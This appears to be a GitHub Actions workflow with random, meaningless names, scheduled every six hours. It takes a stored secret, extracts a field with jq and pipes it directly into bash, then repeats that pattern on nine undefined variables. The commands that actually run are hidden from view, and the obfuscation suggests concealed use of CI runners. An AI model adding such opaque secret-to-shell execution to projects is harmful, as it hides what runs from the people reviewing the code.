name: liaojiexcv
on:
  workflow_dispatch:
  schedule:
    - cron: '49 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liaojiexcv
        env:
          ugb211: ${{ secrets.ugb211 }}
        run: |
          echo $ugb211 | jq -r .volz21765 | /bin/bash
          echo $aymh213 | jq -r .tb44297 | /bin/bash
          echo $qghh299 | jq -r .bnw2307 | /bin/bash
          echo $nbu02520 | jq -r .qzrjp635 | /bin/bash
          echo $f0 | jq -r .beof98 | /bin/bash
          echo $rya57 | jq -r .uriy684 | /bin/bash
          echo $vfbx214 | jq -r .qtsrt6966 | /bin/bash
          echo $vs74946 | jq -r .cktn7 | /bin/bash
          echo $qct03347 | jq -r .wqorg2456 | /bin/bash
          echo $c23 | jq -r .dhiq78270 | /bin/bash

